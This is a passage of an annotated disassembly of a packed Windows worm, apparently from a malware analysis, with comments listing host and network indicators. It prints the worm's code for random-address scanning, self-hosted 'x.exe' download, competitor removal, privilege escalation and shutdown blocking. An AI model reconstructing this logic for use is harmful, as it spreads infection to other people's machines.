loc_314222DB: ; CODE XREF: sub_314221C4+133j
        lea eax, [ebp+var_8]
        push eax
        lea eax, [ebp+var_28]
        push eax
        push edi
        call dword_31421148 ; accept
        push eax ; accepted socket = thread parameter
        push offset sub_3142207E
        call sub_31421F52
        pop ecx
        pop ecx
        jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3Dj
        push ebx
        call dword_314210D0 ; ExitThread
        pop edi
        xor eax, eax
        pop ebx
        leave
        retn 4
sub_314221C4 endp

; =============== S U B R O U T I N E =======================================
; sub_31422308 -- calls WSAStartup twice, requesting version word 2 and then
; 102h, both into the same 190h-byte buffer. Results are not checked.
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FCp
var_190 = byte ptr -190h
        push ebp
        mov ebp, esp
        sub esp, 190h
        lea eax, [ebp+var_190]
        push esi
        mov esi, dword_3142113C
        push eax
        push 2
        call esi ; WSAStartup
        lea eax, [ebp+var_190]
        push eax
        push 102h
        call esi ; WSAStartup
        pop esi
        leave
        retn
sub_31422308 endp

; ---------------------------------------------------------------------------
; Program entry after unpacking (reached by a jump from the UPX1 section).
; Order of operations shown below:
;   - store own module base in dword_31425000
;   - delete "ftpupd.exe" (relative path, so the current directory)
;   - seed rand(), create mutex "uterm19" (handle -> dword_31424FF4) and
;     exit with code 1 if the last error is 0B7h (ERROR_ALREADY_EXISTS),
;     i.e. another instance already holds it
;   - sub_31421D68: enable SeDebugPrivilege
;   - sub_314229E6: remove listed autorun values and terminate matching
;     processes
;   - sub_31422B67: install / persistence logic
;   - sub_31421DF0: start sub_314223B2 inside another process; if that
;     fails (non-zero), run sub_314223B2(0) in this process instead
; Analyst note: the mutex name "uterm19" and the file name "ftpupd.exe" are
; the host indicators visible here.
loc_31422334: ; CODE XREF: UPX1:31427D08j
        push 0
        call dword_314210B4 ; GetModuleHandleA
        push offset aFtpupd_exe ; "ftpupd.exe"
        mov dword_31425000, eax
        call dword_31421074 ; DeleteFileA
        call sub_31421EFB
        push offset aUterm19 ; "uterm19"
        call sub_31421F29
        pop ecx
        mov dword_31424FF4, eax
        call dword_314210E4 ; RtlGetLastWin32Error
        cmp eax, 0B7h
        jnz short loc_31422376
        push 1
        call dword_314210E0 ; ExitProcess
loc_31422376: ; CODE XREF: UPX0:3142236Cj
        call sub_31421D68
        call sub_314229E6
        call sub_31422B67
        push offset sub_314223B2
        call sub_31421DF0
        test eax, eax
        pop ecx
        jz short loc_3142239B
        push 0
        call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392j
        xor eax, eax
        retn

; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525p
 ; sub_3142255F:loc_31422578p ...
; sub_3142239E (its "proc near" line ends the preceding source line):
; poll the stop event in dword_31424FF8 with a zero timeout. Returns 1 when
; WaitForSingleObject returns 0 (event signalled), otherwise 0.
        push 0
        push dword_31424FF8
        call dword_31421070 ; WaitForSingleObject
        neg eax
        sbb eax, eax
        inc eax ; 0 -> 1, anything else -> 0
        retn
sub_3142239E endp

; =============== S U B R O U T I N E =======================================
; sub_314223B2 -- main worker; run either locally with arg_0 = 0 or as the
; remote thread started by sub_31421DF0 with arg_0 = 1.
;   - installs an exception-handler frame (fs:0)
;   - creates the manual-reset event "u19x" (handle -> dword_31424FF8),
;     which every worker polls through sub_3142239E as its stop signal
;   - signals the 9 events "u10x".."u18x" if they exist (sub_3142204E)
;   - creates the 13 mutexes "u8".."u19" (including "u13i")
;     NOTE(review): presumably these stop and block earlier builds of the
;     same family -- inferred from the naming pattern only
;   - when arg_0 != 0: loads ws2_32, wininet, msvcrt, advapi32 and user32
;     and re-creates the "uterm19" mutex
;   - initialises Winsock and starts three threads: sub_314221C4,
;     sub_314216A2 (outside this excerpt) and loc_3142276E
;   - until the stop event is signalled: AbortSystemShutdownA(NULL), then
;     sleep 1388h ms
; Analyst note: the event and mutex names listed here are usable host
; indicators; the periodic AbortSystemShutdownA call cancels pending system
; shutdowns while the sample runs.
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396p
 ; DATA XREF: UPX0:31422385o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        push 0FFFFFFFFh
        push offset dword_31421190
        push offset loc_31422CD0
        mov eax, large fs:0
        push eax
        mov large fs:0, esp ; link the new exception-handler record
        sub esp, 64h
        push ebx
        push esi
        push edi
        ; var_70..var_50: table of 9 event names
        mov [ebp+var_70], offset aU10x ; "u10x"
        mov [ebp+var_6C], offset aU11x ; "u11x"
        mov [ebp+var_68], offset aU12x ; "u12x"
        mov [ebp+var_64], offset aU13x ; "u13x"
        mov [ebp+var_60], offset aU14x ; "u14x"
        mov [ebp+var_5C], offset aU15x ; "u15x"
        mov [ebp+var_58], offset aU16x ; "u16x"
        mov [ebp+var_54], offset aU17x ; "u17x"
        mov [ebp+var_50], offset aU18x ; "u18x"
        ; var_4C..var_1C: table of 13 mutex names
        mov [ebp+var_4C], offset aU8 ; "u8"
        mov [ebp+var_48], offset aU9 ; "u9"
        mov [ebp+var_44], offset aU10 ; "u10"
        mov [ebp+var_40], offset aU11 ; "u11"
        mov [ebp+var_3C], offset aU12 ; "u12"
        mov [ebp+var_38], offset aU13 ; "u13"
        mov [ebp+var_34], offset aU13i ; "u13i"
        mov [ebp+var_30], offset aU14 ; "u14"
        mov [ebp+var_2C], offset aU15 ; "u15"
        mov [ebp+var_28], offset aU16 ; "u16"
        mov [ebp+var_24], offset aU17 ; "u17"
        mov [ebp+var_20], offset aU18 ; "u18"
        mov [ebp+var_1C], offset aU19 ; "u19"
        push offset aU19x ; "u19x"
        xor edi, edi ; edi = 0 for the rest of the routine
        push edi ; initial state: not signalled
        push 1 ; manual reset
        push edi
        call dword_3142106C ; CreateEventA
        mov dword_31424FF8, eax ; stop event polled by sub_3142239E
        mov [ebp+var_4], edi
        mov [ebp+var_74], edi ; loop index
loc_3142248B: ; CODE XREF: sub_314223B2+EFj
        cmp [ebp+var_74], 9
        jnb short loc_314224A3
        mov eax, [ebp+var_74]
        push [ebp+eax*4+var_70]
        call sub_3142204E ; signal the event if it exists
        pop ecx
        inc [ebp+var_74]
        jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DDj
        mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10Aj
        cmp [ebp+var_74], 0Dh
        jnb short loc_314224BE
        mov eax, [ebp+var_74]
        push [ebp+eax*4+var_4C]
        call sub_31421F29 ; create the mutex; the handle is not kept
        pop ecx
        inc [ebp+var_74]
        jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8j
        cmp [ebp+arg_0], edi
        jz short loc_314224FC ; arg_0 == 0: running in the original process
        push offset aWs2_32 ; "ws2_32"
        mov esi, dword_314210A8
        call esi ; LoadLibraryA
        push offset aWininet ; "wininet"
        call esi ; LoadLibraryA
        push offset aMsvcrt ; "msvcrt"
        call esi ; LoadLibraryA
        push offset aAdvapi32 ; "advapi32"
        call esi ; LoadLibraryA
        push offset aUser32 ; "user32"
        call esi ; LoadLibraryA
        push offset aUterm19 ; "uterm19"
        call sub_31421F29
        pop ecx
        mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10Fj
        call sub_31422308 ; WSAStartup
        push edi
        push offset sub_314221C4
        call sub_31421F38
        push edi
        push offset sub_314216A2
        call sub_31421F38
        push edi
        push offset loc_3142276E
        call sub_31421F38
        add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18Ej
        call sub_3142239E
        test eax, eax
        jnz short loc_31422542 ; stop event signalled
        push edi
        call dword_31421018 ; AbortSystemShutdownA
        push 1388h
        call dword_31421094 ; Sleep
        jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17Aj
        or [ebp+var_4], 0FFFFFFFFh
        call nullsub_2
        xor eax, eax
        mov ecx, [ebp+var_10]
        mov large fs:0, ecx ; unlink the exception-handler record
        pop edi
        pop esi
        pop ebx
        leave
        retn 4
sub_314223B2 endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B R O U T I N E =======================================
; sub_3142255F -- worker thread: walk the last address byte of arg_0.
;   arg_0 : IPv4 address as 4 raw bytes (first byte = first octet).
; Returns 1 immediately when the first byte is 7Fh. Otherwise, for every
; last-byte value 0..0FEh except the original one, passes the address to
; sub_31421801 (the per-target network routine; it starts before this
; excerpt) and then sleeps word_3142500C + rand() % word_3142500C ms.
; Stops early when the stop event is signalled or connectivity is lost.
; Analyst note: sequential connections across one /24 from a single host
; are the network-side pattern of this routine.
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55o
 ; sub_3142264B+6Ao ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        push ecx
        cmp byte ptr [ebp+arg_0], 7Fh
        jnz short loc_3142256E
        push 1
        pop eax
        jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8j
        mov al, byte ptr [ebp+arg_0+3]
        push ebx
        push esi
        mov [ebp+var_1], al ; remember the original last byte
        xor bl, bl ; bl = candidate last byte
loc_31422578: ; CODE XREF: sub_3142255F+5Aj
        call sub_3142239E
        test eax, eax
        jnz short loc_314225BB
        call sub_31422038
        test eax, eax
        jz short loc_314225BB
        cmp [ebp+var_1], bl
        jz short loc_314225B4 ; skip the address that was passed in
        mov byte ptr [ebp+arg_0+3], bl
        push [ebp+arg_0]
        call sub_31421801
        movzx esi, word_3142500C
        pop ecx
        call dword_314210FC ; rand
        cdq
        idiv esi
        add edx, esi
        push edx
        call dword_31421094 ; Sleep
loc_314225B4: ; CODE XREF: sub_3142255F+2Ej
        inc bl
        cmp bl, 0FFh
        jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20j
 ; sub_3142255F+29j
        pop esi
        xor eax, eax
        pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+Dj
        leave
        retn 4
sub_3142255F endp

; =============== S U B R O U T I N E =======================================
; sub_314225C3 -- worker thread: randomise the last two address bytes.
;   arg_0 : IPv4 address as 4 raw bytes.
; Returns 1 immediately when the first byte is 7Fh. Otherwise repeats up to
; 8000h times: replace bytes 2 and 3 with rand() values, increment the
; counter dword_31425004, call sub_31421801 on the address and, when that
; returns 0, start a sub_3142255F thread for it; then sleep
; word_3142500C + rand() % word_3142500C ms. Stops early on the stop event
; or on loss of connectivity.
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7Eo
 ; UPX0:31422803o
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        cmp byte ptr [ebp+arg_0], 7Fh
        jnz short loc_314225D1
        push 1
        pop eax
        jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7j
        push ebx
        push esi
        push edi
        call sub_31421EFB ; seed rand() for this thread
        mov esi, dword_314210FC
        xor ebx, ebx ; iteration counter
loc_314225E1: ; CODE XREF: sub_314225C3+7Dj
        call sub_3142239E
        test eax, eax
        jnz short loc_31422642
        call sub_31422038
        test eax, eax
        jz short loc_31422642
        call esi ; rand
        mov byte ptr [ebp+arg_0+2], al
        call esi ; rand
        push offset dword_31425004
        mov byte ptr [ebp+arg_0+3], al
        call dword_314210D4 ; InterlockedIncrement
        push [ebp+arg_0]
        call sub_31421801
        test eax, eax
        pop ecx
        jnz short loc_31422624
        push [ebp+arg_0]
        push offset sub_3142255F
        call sub_31421F52
        pop ecx
        pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50j
        movzx edi, word_3142500C
        call esi ; rand
        cdq
        idiv edi
        add edx, edi
        push edx
        call dword_31421094 ; Sleep
        inc ebx
        cmp ebx, 8000h
        jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25j
 ; sub_314225C3+2Ej
        pop edi
        pop esi
        xor eax, eax
        pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+Cj
        pop ebp
        retn 4
sub_314225C3 endp

; =============== S U B R O U T I N E =======================================
; sub_3142264B -- worker thread: fully random addresses.
; Builds a 4-byte address from rand() (first byte re-drawn while it is 7Fh),
; skips it when it equals the local address from sub_31421FF9, and, when
; connected, increments dword_31425004 and calls sub_31421801. A zero result
; starts one sub_3142255F thread and four sub_314225C3 threads for that
; address. Sleeps 2710h ms when not connected, then
; word_3142500C + rand() % word_3142500C ms, and repeats until the stop
; event is signalled; the thread then exits. The thread parameter is unused.
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281Bo
var_8 = dword ptr -8
var_4 = dword ptr -4
        push ebp
        mov ebp, esp
        push ecx
        push ecx
        call sub_31421EFB
        call sub_3142239E
        test eax, eax
        jnz loc_31422704
        push ebx
        mov ebx, dword_31421094 ; Sleep
        push esi
        mov esi, dword_314210FC ; rand
        push edi
loc_31422671: ; CODE XREF: sub_3142264B+48j
 ; sub_3142264B+B0j
        call esi ; rand
        mov byte ptr [ebp+var_4+1], al
        call esi ; rand
        mov byte ptr [ebp+var_4+3], al
        call esi ; rand
        mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3Cj
        call esi ; rand
        cmp al, 7Fh
        mov byte ptr [ebp+var_4], al
        jz short loc_31422680 ; never use 7Fh as the first byte
        call sub_31421FF9
        mov edi, [ebp+var_4]
        cmp edi, eax
        jz short loc_31422671 ; skip the local address
        call sub_31422038
        test eax, eax
        jz short loc_314226DC
        push offset dword_31425004
        call dword_314210D4 ; InterlockedIncrement
        push edi
        call sub_31421801
        test eax, eax
        pop ecx
        jnz short loc_314226E3
        push edi
        push offset sub_3142255F
        call sub_31421F52
        pop ecx
        mov [ebp+var_8], 4 ; four sub_314225C3 threads follow
        pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8Dj
        push edi
        push offset sub_314225C3
        call sub_31421F52
        dec [ebp+var_8]
        pop ecx ; pop leaves the flags from dec untouched
        pop ecx
        jnz short loc_314226C8
        jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51j
        push 2710h
        call ebx ; Sleep
loc_314226E3: ; CODE XREF: sub_3142264B+67j
 ; sub_3142264B+8Fj
        movzx edi, word_3142500C
        call esi ; rand
        cdq
        idiv edi
        add edx, edi
        push edx
        call ebx ; Sleep
        call sub_3142239E
        test eax, eax
        jz loc_31422671
        pop edi
        pop esi
        pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11j
        push 0
        call dword_314210D0 ; ExitThread
        xor eax, eax
        leave
        retn 4
sub_3142264B endp

; =============== S U B R O U T I N E =======================================
; sub_31422712 -- rebuild the download URL for this host.
; Formats "http://%s:%d/x.exe" from the local address (sub_31421FF9 ->
; inet_ntoa) and the listener port in dword_31424FFC, copies the result to
; word_314242BA (2 bytes into the buffer at byte_314242B8) and then stores
; the byte 0DFh at byte_314242B8[lstrlenA(byte_314242B8)].
; Analyst note: the URL shape http://<address>:<port>/x.exe is a network
; indicator for this sample.
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0p
 ; UPX0:loc_31422846p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
        push ebp
        mov ebp, esp
        sub esp, 50h
        push esi
        call sub_31421FF9
        push eax
        call dword_3142115C ; inet_ntoa
        mov esi, dword_31421068
        push eax
        lea eax, [ebp+var_28]
        push eax
        call esi ; lstrcpyA
        push dword_31424FFC ; listener port
        lea eax, [ebp+var_28]
        push eax
        lea eax, [ebp+var_50]
        push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
        push eax
        call dword_3142111C ; wsprintfA
        add esp, 10h
        lea eax, [ebp+var_50]
        push eax
        push offset word_314242BA
        call esi ; lstrcpyA
        push offset byte_314242B8
        call dword_31421084 ; lstrlenA
        mov byte_314242B8[eax], 0DFh
        pop esi
        leave
        retn
sub_31422712 endp

; ---------------------------------------------------------------------------
; loc_3142276E -- scheduler thread started from sub_314223B2 (IDA did not
; define it as a function).
;   - resets the counter dword_31425004 and waits for connectivity, polling
;     every 1388h ms
;   - reads the connection flags: when bit 2 is set it selects
;     dword_31425008 = 1, 15Eh random-address threads and a delay base of
;     14h in word_3142500C; otherwise dword_31425008 = 0, 50h threads and a
;     delay base of 96h
;   - builds the URL (sub_31422712), then starts one sub_3142255F thread on
;     the local address (unless it is 100007Fh), four sub_314225C3 threads
;     on the local address and the selected number of sub_3142264B threads
;   - afterwards watches connectivity and rebuilds the URL each time the
;     connection comes back
loc_3142276E: ; DATA XREF: sub_314223B2+166o
        push ecx
        push ecx
        push ebx
        push ebp
        push esi
        xor ebx, ebx
        push edi
        mov dword_31425004, ebx
        call sub_31422038
        mov esi, dword_31421094 ; Sleep
        mov edi, 1388h ; poll interval
        test eax, eax
        jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279Aj
        push edi
        call esi ; Sleep
        call sub_31422038
        test eax, eax
        jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278Ej
        lea eax, [esp+14h]
        push ebx
        push eax
        call dword_31421130 ; InternetGetConnectedState
        test byte ptr [esp+14h], 2 ; the jz below uses these flags; push/mov/pop leave them intact
        push 50h
        mov dword_31425008, ebx
        pop ebp ; ebp = 50h: default number of sub_3142264B threads
        mov word_3142500C, 96h
        jz short loc_314227D9
        mov dword_31425008, 1
        mov ebp, 15Eh
        mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BFj
        call sub_31421FF9
        mov ebx, eax ; ebx = local address
        call sub_31422712
        cmp ebx, 100007Fh
        jz short loc_314227FA
        push ebx
        push offset sub_3142255F
        call sub_31421F52
        pop ecx
        pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EBj
        mov dword ptr [esp+10h], 4 ; loop counter in a local stack slot
loc_31422802: ; CODE XREF: UPX0:31422813j
        push ebx
        push offset sub_314225C3
        call sub_31421F52
        dec dword ptr [esp+18h] ; same slot, 8 bytes deeper because two arguments are still pushed
        pop ecx
        pop ecx
        jnz short loc_31422802
        test ebp, ebp
        jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828j
        push 0
        push offset sub_3142264B
        call sub_31421F52
        pop ecx
        dec ebp
        pop ecx
        jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817j
 ; UPX0:31422836j ...
        call sub_31422038
        test eax, eax
        jz short loc_31422838
        push edi
        call esi ; Sleep
        jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831j
 ; UPX0:31422844j
        call sub_31422038
        test eax, eax
        jnz short loc_31422846
        push edi
        call esi ; Sleep
        jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283Fj
        call sub_31422712
        jmp short loc_3142282A

; =============== S U B R O U T I N E =======================================
; sub_3142284D -- delete one registry value.
;   arg_0 : root key, arg_4 : subkey path, arg_8 : value name.
; Opens the key with access 0F003Fh; the key handle is written over the
; arg_4 slot. Nothing is done when the open fails; the RegDeleteValueA
; result is left in eax only incidentally (RegCloseKey follows).
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93p
 ; sub_31422B67+11Ap
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        lea eax, [ebp+arg_4]
        push eax ; key handle out (reuses the arg_4 slot)
        push 0F003Fh
        push 0
        push [ebp+arg_4]
        push [ebp+arg_0]
        call dword_3142100C ; RegOpenKeyExA
        test eax, eax
        jnz short loc_31422880
        push [ebp+arg_8]
        push [ebp+arg_4]
        call dword_31421010 ; RegDeleteValueA
        push [ebp+arg_4]
        call dword_31421014 ; RegCloseKey
loc_31422880: ; CODE XREF: sub_3142284D+1Cj
        pop ebp
        retn
sub_3142284D endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33p
 ; sub_314229E6+84p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
; sub_31422882 (its "proc near" line ends the preceding source line):
; read one registry value.
;   arg_0 : root key, arg_4 : subkey path, arg_8 : value name,
;   arg_C : output buffer, arg_10 : buffer size in bytes.
; Returns 0 on success, 1 when the key cannot be opened, 2 when the value
; cannot be read. The argument slots are reused as out-parameters: arg_10
; receives the key handle and arg_4 the value type.
        push ebp
        mov ebp, esp
        push ecx
        mov eax, [ebp+arg_10]
        push esi
        mov [ebp+var_4], eax ; var_4 = in/out size for the query
        lea eax, [ebp+arg_10]
        push eax ; key handle out (reuses the arg_10 slot)
        xor esi, esi ; esi = result code, 0 so far
        push 0F003Fh
        push esi
        push [ebp+arg_4]
        push [ebp+arg_0]
        call dword_3142100C ; RegOpenKeyExA
        test eax, eax
        jz short loc_314228AE
        push 1
        pop eax
        jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25j
        lea eax, [ebp+var_4]
        push eax ; size in/out
        lea eax, [ebp+arg_4]
        push [ebp+arg_C] ; data buffer
        push eax ; type out (reuses the arg_4 slot)
        push esi
        push [ebp+arg_8] ; value name
        push [ebp+arg_10] ; key handle
        call dword_31421008 ; RegQueryValueExA
        test eax, eax
        jz short loc_314228CD
        push 2
        pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46j
        push [ebp+arg_10]
        call dword_31421014 ; RegCloseKey
        mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2Aj
        pop esi
        leave
        retn
sub_31422882 endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96p
 ; sub_31422B67+7Cp ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
; sub_314228DB (its "proc near" line ends the preceding source line):
; create or open a registry key and write one string value.
;   arg_0 : root key, arg_4 : subkey path, arg_8 : value name,
;   arg_C : data, arg_10 : data size in bytes. The value type is 1 (REG_SZ).
; Returns 0 on success, 1 when the key cannot be created, 2 when the value
; cannot be written. The key handle is written over the arg_4 slot.
        push ebp
        mov ebp, esp
        push esi
        xor esi, esi ; esi = 0: NULL arguments and the result code
        lea eax, [ebp+arg_4]
        push esi
        push eax ; key handle out (reuses the arg_4 slot)
        push esi
        push 0F003Fh
        push esi
        push esi
        push esi
        push [ebp+arg_4]
        push [ebp+arg_0]
        call dword_31421000 ; RegCreateKeyExA
        test eax, eax
        jz short loc_31422904
        push 1
        pop eax
        jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22j
        push [ebp+arg_10]
        push [ebp+arg_C]
        push 1
        push esi
        push [ebp+arg_8]
        push [ebp+arg_4]
        call dword_31421004 ; RegSetValueExA
        test eax, eax
        jz short loc_31422920
        push 2
        pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40j
        push [ebp+arg_4]
        call dword_31421014 ; RegCloseKey
        mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27j
        pop esi
        pop ebp
        retn
sub_314228DB endp

; =============== S U B R O U T I N E =======================================
; sub_3142292E -- terminate running processes that match a file path.
;   arg_0 : path string; the part after the last backslash is compared.
; Takes a process snapshot and, for every entry, calls
; strstr(file name from the path, entry's executable name); on a match the
; process is opened with access 1F0FFFh and terminated with exit code 0.
; Returns early when the string is shorter than two characters or the
; snapshot fails. The arg_0 slot is reused for the snapshot handle; neither
; it nor the process handles are closed here, and the OpenProcess result is
; not checked.
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9Fp
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 128h
        push ebx
        mov ebx, [ebp+arg_0] ; ebx = path
        push esi
        push ebx
        call dword_31421084 ; lstrlenA
        mov esi, eax
        dec esi ; esi = index of the last character
        test esi, esi
        jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27j
        cmp byte ptr [esi+ebx], 5Ch ; scan backwards for '\'
        jz short loc_31422957
        dec esi
        jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24j
        push 0
        push 2 ; snapshot of processes
        call sub_31422D2C ; CreateToolhelp32Snapshot
        cmp eax, 0FFFFFFFFh
        mov [ebp+arg_0], eax
        jz short loc_314229E2
        push 128h
        lea eax, [ebp+var_128]
        push 0
        push eax
        call sub_31422CD6 ; memset
        add esp, 0Ch
        lea eax, [ebp+var_128]
        mov [ebp+var_128], 128h ; size field of the entry structure
        push eax
        push [ebp+arg_0]
        call sub_31422D26 ; Process32First
        test eax, eax
        jz short loc_314229E2
        lea esi, [esi+ebx+1] ; esi -> file name part of the path
loc_3142299F: ; CODE XREF: sub_3142292E+B2j
        lea eax, [ebp+var_104] ; entry's executable name
        push eax
        push esi
        call dword_31421104 ; strstr
        pop ecx
        test eax, eax
        pop ecx
        jz short loc_314229CF
        push [ebp+var_120] ; entry's process id
        push 0
        push 1F0FFFh
        call dword_314210B0 ; OpenProcess
        push 0
        push eax
        call dword_31421060 ; TerminateProcess
loc_314229CF: ; CODE XREF: sub_3142292E+83j
        lea eax, [ebp+var_128]
        push eax
        push [ebp+arg_0]
        call sub_31422D20 ; Process32Next
        test eax, eax
        jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1Aj
 ; sub_3142292E+38j ...
        pop esi
        pop ebx
        leave
        retn
sub_3142292E endp

; =============== S U B R O U T I N E =======================================
; sub_314229E6 -- remove a fixed list of autorun entries and stop the
; programs they point to.
; For each of the 0Bh value names in the table below, under the HKLM key
; that IDA truncates to "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
; (presumably CurrentVersion\Run -- confirm in the data section): if the
; value exists, it is deleted (sub_3142284D) and processes matching the
; stored path are terminated (sub_3142292E).
; Analyst note: sudden removal of several of these value names on one host
; is consistent with this routine having run.
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237Bp
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
        push ebp
        mov ebp, esp
        sub esp, 13Ch
        push ebx
        push esi
        lea eax, [ebp+var_34]
        push edi
        mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
        mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
        mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
        mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
        mov [ebp+var_24], offset aSystray ; "SysTray"
        mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
        mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
        mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
        mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
        mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
        mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
        mov [ebp+var_4], eax ; cursor into the table
        mov [ebp+var_8], 0Bh ; entries remaining
        mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AEj
        mov eax, [ebp+var_4]
        push 104h
        mov ebx, [eax] ; ebx = current value name
        lea eax, [ebp+var_13C]
        push eax ; receives the stored path
        push ebx
        push edi
        push esi
        call sub_31422882
        add esp, 14h
        test eax, eax
        jnz short loc_31422A8D ; value not present: next entry
        push ebx
        push edi
        push esi
        call sub_3142284D
        lea eax, [ebp+var_13C]
        push eax
        call sub_3142292E
        add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8Ej
        add [ebp+var_4], 4
        dec [ebp+var_8]
        jnz short loc_31422A56
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_314229E6 endp

; =============== S U B R O U T I N E =======================================
; sub_31422A9B -- install a copy of the executable and hand over to it.
;   arg_0 : path of a file to delete first, or 0 for none
;   arg_4 : path of the file to copy (the running executable at both call
;           sites in sub_31422B67)
; Builds <system directory> + string at dword_314241F8 + 5..8 random
; lowercase letters + string at dword_314241F0 (the contents of both strings
; are not shown in this excerpt), copies arg_4 there, writes that path as
